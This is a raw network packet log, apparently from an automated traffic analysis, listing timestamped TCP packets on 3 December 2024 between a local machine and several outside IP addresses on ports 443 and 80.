                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.919446945 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.962297916 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.975753069 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.975764036 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.976058960 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.000963926 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.001032114 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.007252932 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.051333904 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.177118063 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.177334070 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.177356958 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.177834988 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.178136110 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.178200006 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.178272009 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.178333998 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.178354025 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.182004929 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.182184935 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.182228088 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.183500051 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.183514118 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.398999929 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.399441004 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.399470091 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.399542093 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.399559021 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.400422096 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.400429010 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.407613039 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.407762051 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.407768011 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.415985107 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.416040897 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.416048050 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.432653904 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.432864904 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.432929993 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.432936907 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.433640957 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.519155025 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.521373034 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.521589994 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.521622896 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.522648096 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.522701025 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.524085045 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.524149895 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.524343967 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.569164991 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.569165945 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.569175959 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.590934992 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.596097946 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.596163034 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.596172094 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.604229927 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.604295015 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.604302883 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.611654043 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.611723900 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.611730099 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.615427971 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.661675930 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.734769106 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.785198927 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.785206079 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.831633091 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.856419086 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.861274004 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.861324072 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.861330032 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.914725065 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.981172085 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.983606100 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.983715057 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.983725071 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.988513947 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.988539934 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.988564014 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.988571882 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.988605976 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.989669085 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.991050005 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.991076946 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.991103888 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.991111040 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.991271019 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.992543936 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.997509003 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.998641014 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.998667955 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.998698950 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.998727083 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.999021053 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:56.999758959 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.000392914 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.000441074 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.000447989 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.002749920 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.002803087 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.002810955 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.006515980 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.006557941 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.006566048 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.031193018 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.031220913 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.031239986 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.031251907 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.031475067 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.032593966 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.039036036 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.039088011 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.039094925 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.042737961 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.042788029 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.042793989 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.043003082 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.050868988 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.050874949 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.050910950 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.054442883 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.054881096 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.054889917 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.055444956 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.055452108 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.059564114 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.059614897 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.059621096 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.059700012 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.061428070 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.101192951 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.101200104 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.101249933 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.101610899 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.113019943 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.113070965 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.117726088 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.120948076 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.121021986 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.122018099 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.122065067 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.122075081 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.130650043 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.130697012 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.130707026 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.136365891 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.136429071 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.139758110 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.139802933 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.139811993 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.148593903 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.149657011 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.149665117 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.158102036 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.158154011 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.158162117 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.174457073 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.174503088 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.174510956 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.216600895 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.219297886 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.219368935 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.219966888 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.222949982 CET4972380192.168.2.42.20.68.201
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.223586082 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.223639011 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.237795115 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.237843990 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.238890886 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.238939047 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.238955021 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.242403984 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.242470026 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.242477894 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.248354912 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.248425007 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.251352072 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.251396894 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.251405001 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.260348082 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.260399103 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.264652014 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.264694929 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.264702082 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.268479109 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.268520117 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.268527031 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.273190022 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.273245096 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.277759075 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.277803898 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.277816057 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.280256987 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.280312061 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.292124033 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.292329073 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.292375088 CET4434977035.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.292424917 CET49770443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.292742014 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.292800903 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.293020964 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.293051958 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.293106079 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.293610096 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.293617010 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.296181917 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.296228886 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.296237946 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.305208921 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.305286884 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.311523914 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.311574936 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.311578989 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.311630964 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.311647892 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.311660051 CET44349767104.18.94.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.311669111 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.311697960 CET49767443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.340482950 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.340542078 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.340554953 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.345380068 CET80497232.20.68.201192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.345438957 CET4972380192.168.2.42.20.68.201
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.352535009 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.352591991 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.352600098 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.352643013 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.366245985 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.366254091 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.366301060 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.366309881 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.366350889 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.375103951 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.375112057 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.375159025 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.379998922 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.380006075 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.380050898 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.392005920 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.392013073 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.392060041 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.396794081 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.396800995 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.396842003 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.418171883 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.418224096 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.426718950 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.426769018 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.466156960 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.466209888 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.470408916 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.470458031 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.479957104 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.480007887 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.484453917 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.484517097 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.493539095 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.493592978 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.502522945 CET44349768104.18.95.41192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.502576113 CET49768443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:57.510691881 CET44349768104.18.95.41192.168.2.4
